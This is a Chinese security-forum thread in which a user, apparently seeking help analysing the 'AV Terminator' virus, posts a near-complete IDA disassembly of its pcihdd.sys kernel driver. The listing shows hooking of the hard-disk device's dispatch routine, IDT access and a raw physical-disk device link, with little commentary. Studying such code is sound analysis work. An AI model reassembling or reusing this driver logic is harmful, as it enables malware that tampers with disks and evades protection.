[求助]如何跟踪sys驱动文件,高手给点头绪！-付费问答-看雪-安全社区|安全招聘|kanxue.com

最新回复 (7)
wymjeef 雪币： 324 活跃值： (160) 能力值： ( LV2，RANK：10 ) 在线值：发帖 21 回帖 59 粉丝 0 关注私信	wymjeef 2 楼这个AV终结者病毒就是通过这个pcihdd.sys驱动来进行破坏的~ 以下是IDA反汇编出来的代码： ; ; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ; º This file is generated by The Interactive Disassembler (IDA) º ; º Copyright (c) 2006 by DataRescue sa/nv, <ida@datarescue.com> º ; º Licensed to: Paul Ashton - Blue Lane Technologies (1-user Advanced 03/2006) º%s ; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼ ; ; Input MD5 : 289345E696BBDE6C2C6ABA2D5E506D23 ; File Name : D:\1\pcihdd.sys ; Format : Portable executable for 80386 (PE) ; Imagebase : 400000 ; Section 1. (virtual address 000002B0) ; Virtual size : 0000058A ( 1418.) ; Section size in file : 00000590 ( 1424.) ; Offset to raw data for section: 000002B0 ; Flags 68000020: Text Not pageable Executable Readable ; Alignment : default .686p .mmx .model flat ; Segment type: Pure code ; Segment permissions: Read/Execute _text segment para public 'CODE' use32 assume cs:_text ;org 4002B0h assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing sub_4002B0 proc near jmp short $+2 mov ecx, 100h mov edx, 0CCECC9B1h loc_4002BC: lea eax, [ecx-1] push ecx mov ecx, 8 loc_4002C5: shr eax, 1 jnb short loc_4002CB xor eax, edx loc_4002CB: dec ecx jnz short loc_4002C5 pop ecx mov dword_4008D2[ecx4], eax dec ecx jnz short loc_4002BC retn sub_4002B0 endp sub_4002DA proc near jmp short $+2 mov eax, 0FFFFFFFFh or ebx, ebx jz short loc_4002FA loc_4002E5: mov dl, [ebx] xor dl, al movzx edx, dl shr eax, 8 xor eax, dword_4008D6[edx4] inc ebx dec ecx jnz short loc_4002E5 loc_4002FA: not eax retn sub_4002DA endp ; Attributes: bp-based frame sub_4002FD proc near var_4= dword ptr -4 arg_0= dword ptr 8 arg_4= dword ptr 0Ch arg_8= dword ptr 10h arg_C= dword ptr 14h push ebp mov ebp, esp add esp, 0FFFFFBFCh pusha xor eax, eax mov [ebp+var_4], eax mov esi, [ebp+arg_8] mov cx, [esi+0Ch] add cx, [esi+0Eh] movzx ecx, cx add esi, 10h cmp ecx, 0 jbe short loc_40033E mov ebx, [esi+4] and ebx, 7FFFFFFFh add ebx, [ebp+arg_4] mov eax, [ebx] add eax, [ebp+arg_0] mov ecx, [ebp+arg_C] mov [ecx], eax mov ecx, [ebx+4] mov [ebp+var_4], ecx loc_40033E: popa mov eax, [ebp+var_4] leave retn 10h sub_4002FD endp ; Attributes: bp-based frame sub_400346 proc near var_4= dword ptr -4 arg_0= dword ptr 8 arg_4= dword ptr 0Ch arg_8= dword ptr 10h arg_C= dword ptr 14h arg_10= dword ptr 18h push ebp mov ebp, esp add esp, 0FFFFFBFCh pusha xor eax, eax mov [ebp+var_4], eax mov esi, [ebp+arg_8] mov cx, [esi+0Ch] add cx, [esi+0Eh] movzx ecx, cx add esi, 10h jmp short loc_4003AA loc_400368: push ecx mov ebx, [esi+4] test ebx, 80000000h jz short loc_4003A5 and ebx, 7FFFFFFFh add ebx, [ebp+arg_4] mov edx, [esi] test edx, 80000000h jnz short loc_4003A5 cmp edx, [ebp+arg_C] jnz short loc_4003A5 push [ebp+arg_10] push ebx push [ebp+arg_4] push [ebp+arg_0] call sub_4002FD mov [ebp+var_4], eax or eax, eax jz short loc_4003A5 pop ecx jmp short loc_4003AF loc_4003A5: add esi, 8 pop ecx dec ecx loc_4003AA: cmp ecx, 0 ja short loc_400368 loc_4003AF: popa mov eax, [ebp+var_4] leave retn 14h sub_400346 endp 2007-9-2 17:18 0
wymjeef 雪币： 324 活跃值： (160) 能力值： ( LV2，RANK：10 ) 在线值：发帖 21 回帖 59 粉丝 0 关注私信	wymjeef 3 楼 ; Attributes: bp-based frame sub_4003B7 proc near var_8= dword ptr -8 var_4= dword ptr -4 arg_0= dword ptr 8 arg_4= dword ptr 0Ch arg_8= dword ptr 10h arg_C= dword ptr 14h push ebp mov ebp, esp add esp, 0FFFFFBF8h pusha xor eax, eax mov [ebp+var_4], eax mov edi, [ebp+arg_0] mov edi, [edi+3Ch] add edi, [ebp+arg_0] mov ecx, [edi+8Ch] or ecx, ecx jz short loc_400449 mov eax, [edi+88h] add eax, [ebp+arg_0] mov [ebp+var_8], eax push eax ; VirtualAddress call MmIsAddressValid or eax, eax jnz short loc_4003F1 jmp short loc_400449 loc_4003F1: mov esi, [ebp+var_8] mov cx, [esi+0Ch] add cx, [esi+0Eh] movzx ecx, cx add esi, 10h jmp short loc_400444 loc_400404: push ecx mov ebx, [esi+4] test ebx, 80000000h jz short loc_40043F and ebx, 7FFFFFFFh add ebx, [ebp+var_8] mov eax, [esi] test eax, 80000000h jnz short loc_40043F cmp eax, [ebp+arg_8] jnz short loc_40043F push [ebp+arg_C] push [ebp+arg_4] push ebx push [ebp+var_8] push [ebp+arg_0] call sub_400346 mov [ebp+var_4], eax pop ecx jmp short loc_400449 loc_40043F: add esi, 8 pop ecx dec ecx loc_400444: cmp ecx, 0 ja short loc_400404 loc_400449: popa mov eax, [ebp+var_4] leave retn 10h sub_4003B7 endp ; Attributes: bp-based frame sub_400451 proc near var_4= dword ptr -4 push ebp mov ebp, esp add esp, 0FFFFFFFCh pusha mov [ebp+var_4], 0 loc_40045F: lea ebx, loc_40045F and ebx, 0FFFFFC00h loc_40046B: ; VirtualAddress push ebx call MmIsAddressValid or eax, eax jz short loc_4004B1 cmp ebx, 80000000h jbe short loc_4004B1 cmp word ptr [ebx], 5A4Dh jnz short loc_4004A9 mov edi, ebx add edi, [ebx+3Ch] push edi ; VirtualAddress call MmIsAddressValid or eax, eax jz short loc_40049F cmp word ptr [edi], 4550h jnz short loc_40049F mov [ebp+var_4], ebx jmp short loc_4004B1 loc_40049F: sub ebx, 400h jmp short loc_40046B jmp short loc_4004B1 loc_4004A9: sub ebx, 400h jmp short loc_40046B loc_4004B1: popa mov eax, [ebp+var_4] leave retn sub_400451 endp ; Attributes: bp-based frame sub_4004B7 proc near var_4= dword ptr -4 push ebp mov ebp, esp add esp, 0FFFFFFFCh pusha sidt qword_400CE2 mov esi, dword ptr qword_400CE2+2 mov eax, 9 shl eax, 3 add esi, eax movzx eax, word ptr [esi+6] shl eax, 10h mov ax, [esi] and eax, 0FF000000h mov [ebp+var_4], eax sub eax, eax jz short loc_400515 mov esi, dword ptr qword_400CE2+2 mov eax, 0Eh shl eax, 3 add esi, eax movzx eax, word ptr [esi+6] shl eax, 10h mov ax, [esi] and eax, 0FF000000h cmp eax, [ebp+var_4] jz short loc_400515 mov word ptr [esi+6], 0 loc_400515: popa leave retn sub_4004B7 endp ; Attributes: bp-based frame sub_400518 proc near UnicodeString= UNICODE_STRING ptr -24h SourceString= STRING ptr -1Ch FileObject= dword ptr -8 DeviceObject= dword ptr -4 arg_4= dword ptr 0Ch push ebp mov ebp, esp add esp, 0FFFFFFDCh push edi push esi push ebx mov edi, [ebp+arg_4] mov dword ptr [edi+1Ch], 0 mov dword ptr [edi+18h], 0 mov esi, [edi+60h] movzx eax, byte ptr [esi] or eax, eax jnz short loc_4005B0 jmp short $+2 push offset SourceString ; "\\Device\\Harddisk0\\DR0" lea eax, [ebp+SourceString] push eax ; DestinationString call RtlInitAnsiString push 1 ; AllocateDestinationString lea eax, [ebp+SourceString] push eax ; SourceString lea eax, [ebp+UnicodeString] push eax ; DestinationString call RtlAnsiStringToUnicodeString xor eax, eax mov [ebp+FileObject], eax mov [ebp+DeviceObject], eax lea eax, [ebp+DeviceObject] push eax ; DeviceObject lea eax, [ebp+FileObject] push eax ; FileObject push 80h ; DesiredAccess lea eax, [ebp+UnicodeString] push eax ; ObjectName call IoGetDeviceObjectPointer mov eax, [ebp+FileObject] jmp short $+2 mov eax, [eax+4] mov dword_4008CE, eax cmp dword ptr [eax+10h], 0 jz short loc_40059A jmp short $+2 mov ecx, [eax+10h] xchg ecx, dword_4008D2 mov [eax+10h], ecx loc_40059A: push [ebp+FileObject] call ObDereferenceObject lea eax, [ebp+UnicodeString] push eax ; UnicodeString call RtlFreeUnicodeString jmp loc_400637 loc_4005B0: cmp eax, 2 jnz short loc_4005CD mov eax, dword_4008CE or eax, eax jz short loc_400637 mov ecx, dword_4008D2 or ecx, ecx jz short loc_4005CB mov [eax+10h], ecx loc_4005CB: jmp short loc_400637 loc_4005CD: cmp eax, 0Eh jnz short loc_400637 mov eax, [esi+0Ch] cmp eax, 0F0003C04h jnz short loc_400637 call sub_4002B0 mov ebx, [edi+0Ch] mov ecx, [esi+8] call sub_4002DA mov dword_400CD6, eax push dword_400CD6 push (offset qword_400CE2+6) ; Format call DbgPrint add esp, 8 mov eax, [esi+4] cmp eax, NumberOfBytes jbe short loc_400637 mov edi, [edi+3Ch] mov esi, P mov ecx, NumberOfBytes shr ecx, 2 loc_400621: lodsd xor eax, dword_400CD6 stosd dec ecx jnz short loc_400621 mov ecx, NumberOfBytes and ecx, 3 rep movsb loc_400637: push 0 push [ebp+arg_4] call IoCompleteRequest mov eax, 0 pop ebx pop esi pop edi leave retn 8 sub_400518 endp 2007-9-2 17:18 0
wymjeef 雪币： 324 活跃值： (160) 能力值： ( LV2，RANK：10 ) 在线值：发帖 21 回帖 59 粉丝 0 关注私信	wymjeef 4 楼 ; Attributes: bp-based frame sub_40064D proc near SourceString= STRING ptr -10h UnicodeString= UNICODE_STRING ptr -8 arg_0= dword ptr 8 push ebp mov ebp, esp add esp, 0FFFFFFF0h push edi push esi push ebx pusha cmp P, 0 jz short loc_40066B push P ; P call ExFreePool loc_40066B: cmp [ebp+arg_0], 0 jz short loc_4006B7 push offset s_DosdevicesPhy ; "\\DosDevices\\PhysicalHardDisk0" lea eax, [ebp+SourceString] push eax ; DestinationString call RtlInitAnsiString push 1 ; AllocateDestinationString lea eax, [ebp+SourceString] push eax ; SourceString lea eax, [ebp+UnicodeString] push eax ; DestinationString call RtlAnsiStringToUnicodeString lea eax, [ebp+UnicodeString] push eax ; SymbolicLinkName call IoDeleteSymbolicLink lea eax, [ebp+UnicodeString] push eax ; UnicodeString call RtlFreeUnicodeString mov edi, [ebp+arg_0] mov esi, [edi+4] jmp short loc_4006B3 loc_4006A8: mov edi, [esi+0Ch] push esi ; DeviceObject call IoDeleteDevice mov esi, edi loc_4006B3: or esi, esi jnz short loc_4006A8 loc_4006B7: popa pop ebx pop esi pop edi leave retn 4 sub_40064D endp ; Attributes: bp-based frame ; int __stdcall start(PDRIVER_OBJECT DriverObject,int) public start start proc near var_20= dword ptr -20h SourceString= STRING ptr -1Ch DeviceObject= dword ptr -14h SymbolicLinkName= UNICODE_STRING ptr -10h UnicodeString= UNICODE_STRING ptr -8 DriverObject= dword ptr 8 push ebp mov ebp, esp add esp, 0FFFFFFE0h push edi push esi push ebx pusha nop nop call sub_4004B7 call sub_400451 or eax, eax jz short loc_40071F mov ecx, eax lea eax, [ebp+var_20] push eax push 3E8h push 3E8h push ecx call sub_4003B7 or eax, eax jz short loc_40071F mov NumberOfBytes, eax push NumberOfBytes ; NumberOfBytes push 0 ; PoolType call ExAllocatePool mov P, eax jmp short $+2 mov edi, P mov esi, [ebp+var_20] mov ecx, NumberOfBytes rep movsb jmp short loc_40072A loc_40071F: popa xor eax, eax dec eax pop ebx pop esi pop edi leave retn 8 loc_40072A: jmp short $+2 mov eax, [ebp+DriverObject] mov dword ptr [eax+34h], offset sub_40064D lea edi, [eax+38h] lea eax, sub_400518 mov [edi], eax mov [edi+8], eax mov [edi+38h], eax push offset s_DevicePhysica ; "\\Device\\PhysicalHardDisk0" lea eax, [ebp+SourceString] push eax ; DestinationString call RtlInitAnsiString push 1 ; AllocateDestinationString lea eax, [ebp+SourceString] push eax ; SourceString lea eax, [ebp+UnicodeString] push eax ; DestinationString call RtlAnsiStringToUnicodeString push offset s_DosdevicesPhy ; "\\DosDevices\\PhysicalHardDisk0" lea eax, [ebp+SourceString] push eax ; DestinationString call RtlInitAnsiString push 1 ; AllocateDestinationString lea eax, [ebp+SourceString] push eax ; SourceString lea eax, [ebp+SymbolicLinkName] push eax ; DestinationString call RtlAnsiStringToUnicodeString lea eax, [ebp+DeviceObject] push eax ; DeviceObject push 0 ; Exclusive push 0 ; DeviceCharacteristics push 15h ; DeviceType lea eax, [ebp+UnicodeString] push eax ; DeviceName push 0 ; DeviceExtensionSize push [ebp+DriverObject] ; DriverObject call IoCreateDevice or eax, eax jz short loc_40079F jmp short loc_4007C9 loc_40079F: lea eax, [ebp+UnicodeString] push eax ; DeviceName lea eax, [ebp+SymbolicLinkName] push eax ; SymbolicLinkName call IoCreateSymbolicLink or eax, eax jz short loc_4007C9 mov edi, [ebp+DriverObject] mov esi, [edi+4] jmp short loc_4007C3 loc_4007B8: mov edi, [esi+0Ch] push esi ; DeviceObject call IoDeleteDevice mov esi, edi loc_4007C3: or esi, esi jnz short loc_4007B8 jmp short $+2 loc_4007C9: lea eax, [ebp+UnicodeString] push eax ; UnicodeString call RtlFreeUnicodeString lea eax, [ebp+SymbolicLinkName] push eax ; UnicodeString call RtlFreeUnicodeString popa xor eax, eax pop ebx pop esi pop edi leave retn 8 start endp align 2 ; [00000006 BYTES: COLLAPSED FUNCTION RtlInitAnsiString. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION RtlFreeUnicodeString. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION RtlAnsiStringToUnicodeString. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION ObDereferenceObject. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION MmIsAddressValid. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION IoGetDeviceObjectPointer. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION IoDeleteSymbolicLink. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION IoDeleteDevice. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION IoCreateSymbolicLink. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION IoCreateDevice. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION IoCompleteRequest. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION ExFreePool. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION ExAllocatePool. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION DbgPrint. PRESS KEYPAD "+" TO EXPAND] align 10h _text ends ; Section 2. (virtual address 00000840) ; Virtual size : 0000003C ( 60.) ; Section size in file : 00000040 ( 64.) ; Offset to raw data for section: 00000840 ; Flags 48000040: Data Not pageable Readable ; Alignment : default ; ; Imports from ntoskrnl.exe ; ; Segment type: Externs ; _idata ; void __stdcall RtlInitAnsiString(PANSI_STRING DestinationString,PCSZ SourceString) extrn __imp_RtlInitAnsiString:dword ; void __stdcall RtlFreeUnicodeString(PUNICODE_STRING UnicodeString) extrn __imp_RtlFreeUnicodeString:dword ; NTSTATUS __stdcall RtlAnsiStringToUnicodeString(PUNICODE_STRING DestinationString,PANSI_STRING SourceString,BOOLEAN AllocateDestinationString) extrn __imp_RtlAnsiStringToUnicodeString:dword extrn __imp_ObDereferenceObject:dword ; BOOLEAN __stdcall MmIsAddressValid(PVOID VirtualAddress) extrn __imp_MmIsAddressValid:dword ; NTSTATUS __stdcall IoGetDeviceObjectPointer(PUNICODE_STRING ObjectName,ACCESS_MASK DesiredAccess,PFILE_OBJECT FileObject,PDEVICE_OBJECT DeviceObject) extrn __imp_IoGetDeviceObjectPointer:dword ; NTSTATUS __stdcall IoDeleteSymbolicLink(PUNICODE_STRING SymbolicLinkName) extrn __imp_IoDeleteSymbolicLink:dword ; void __stdcall IoDeleteDevice(PDEVICE_OBJECT DeviceObject) extrn __imp_IoDeleteDevice:dword ; NTSTATUS __stdcall IoCreateSymbolicLink(PUNICODE_STRING SymbolicLinkName,PUNICODE_STRING DeviceName) extrn __imp_IoCreateSymbolicLink:dword ; NTSTATUS __stdcall IoCreateDevice(PDRIVER_OBJECT DriverObject,ULONG DeviceExtensionSize,PUNICODE_STRING DeviceName,ULONG DeviceType,ULONG DeviceCharacteristics,BOOLEAN Exclusive,PDEVICE_OBJECT *DeviceObject) extrn __imp_IoCreateDevice:dword extrn __imp_IoCompleteRequest:dword ; void __stdcall ExFreePool(PVOID P) extrn __imp_ExFreePool:dword ; PVOID __stdcall ExAllocatePool(POOL_TYPE PoolType,SIZE_T NumberOfBytes) extrn __imp_ExAllocatePool:dword ; ULONG DbgPrint(PCH Format,...) extrn __imp_DbgPrint:dword ; Segment type: Pure data ; Segment permissions: Read _rdata segment para public 'DATA' use32 assume cs:_rdata ;org 40087Ch align 10h _rdata ends ; Section 3. (virtual address 00000880) ; Virtual size : 0000046D ( 1133.) ; Section size in file : 00000470 ( 1136.) ; Offset to raw data for section: 00000880 ; Flags C8000040: Data Not pageable Readable Writable ; Alignment : default 2007-9-2 17:19 0
wymjeef 雪币： 324 活跃值： (160) 能力值： ( LV2，RANK：10 ) 在线值：发帖 21 回帖 59 粉丝 0 关注私信	wymjeef 5 楼 ; Segment type: Pure data ; Segment permissions: Read/Write _data segment para public 'DATA' use32 assume cs:_data ;org 400880h ; char s_DevicePhysica[] s_DevicePhysica db '\Device\PhysicalHardDisk0',0 ; char s_DosdevicesPhy[] s_DosdevicesPhy db '\DosDevices\PhysicalHardDisk0',0 ; char SourceString[] SourceString db '\Device\Harddisk0\DR0',0 dword_4008CE dd 0 dword_4008D2 dd 0 dword_4008D6 dd 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 dword_400CD6 dd 0 ; PVOID P P dd 0 ; SIZE_T NumberOfBytes NumberOfBytes dd 0 qword_400CE2 dq 3025000000000000h db 38h ; 8 db 58h ; X db 0 db 0 db 0 db 0 _data ends ; Section 4. (virtual address 00000CF0) ; Virtual size : 00000198 ( 408.) ; Section size in file : 000001A0 ( 416.) ; Offset to raw data for section: 00000CF0 ; Flags E2000020: Text Discardable Executable Readable Writable ; Alignment : default 2007-9-2 17:20 0
wymjeef 雪币： 324 活跃值： (160) 能力值： ( LV2，RANK：10 ) 在线值：发帖 21 回帖 59 粉丝 0 关注私信	wymjeef 6 楼 ; Segment type: Pure code ; Segment permissions: Read/Write/Execute INIT segment para public 'CODE' use32 assume cs:INIT ;org 400CF0h assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing dd 0D18h, 2 dup(0) dd 0E7Ah, 840h, 5 dup(0) dd 0D54h, 0D68h, 0D80h, 0DA0h, 0DB6h, 0DCAh dd 0DE6h, 0DFEh, 0E10h, 0E28h, 0E3Ah, 0E4Eh dd 0E5Ch, 0E6Eh, 0 db 61h ; a db 3, 52h, 74h s_Linitansistri db 'lInitAnsiString',0 db 50h ; P db 3, 52h, 74h s_Lfreeunicodes db 'lFreeUnicodeString',0 align 10h db 0FAh ; ú db 2, 52h, 74h s_Lansistringto db 'lAnsiStringToUnicodeString',0 align 10h db 0ABh ; « db 2, 4Fh, 62h s_Dereferenceob db 'DereferenceObject',0 dw 245h s_Mmisaddressva db 'MmIsAddressValid',0 align 2 dw 13Dh s_Iogetdeviceob db 'IoGetDeviceObjectPointer',0 align 2 dw 127h s_Iodeletesymbo db 'IoDeleteSymbolicLink',0 align 2 dw 125h s_Iodeletedevic db 'IoDeleteDevice',0 align 10h db 21h ; ! db 1, 49h, 6Fh s_Createsymboli db 'CreateSymbolicLink',0 align 4 dd 6F49011Bh, 61657243h, 65446574h, 65636976h dd 1180000h s_Iocompletereq db 'IoCompleteRequest',0 s_G db 'G',0 s_Exfreepool db 'ExFreePool',0 align 4 s_7 db '7',0 s_Exallocatepoo db 'ExAllocatePool',0 align 2 s_- db '-',0 s_Dbgprint db 'DbgPrint',0 align 2 s_Ntoskrnl_exe db 'ntoskrnl.exe',0 align 10h INIT ends end start 2007-9-2 17:20 0
tanison 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	tanison 7 楼头都看晕乎乎了 2007-9-3 00:17 0
wymjeef 雪币： 324 活跃值： (160) 能力值： ( LV2，RANK：10 ) 在线值：发帖 21 回帖 59 粉丝 0 关注私信	wymjeef 8 楼看看吧！下载包里包括有IDA的数据包 2007-9-3 12:06 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

wymjeef

雪币： 324

活跃值： (160)

能力值：

( LV2，RANK：10 )

在线值：

发帖

21

回帖

59

粉丝

0

关注

私信

wymjeef: 2 楼

这个AV终结者病毒就是通过这个pcihdd.sys驱动来进行破坏的~
以下是IDA反汇编出来的代码：
;
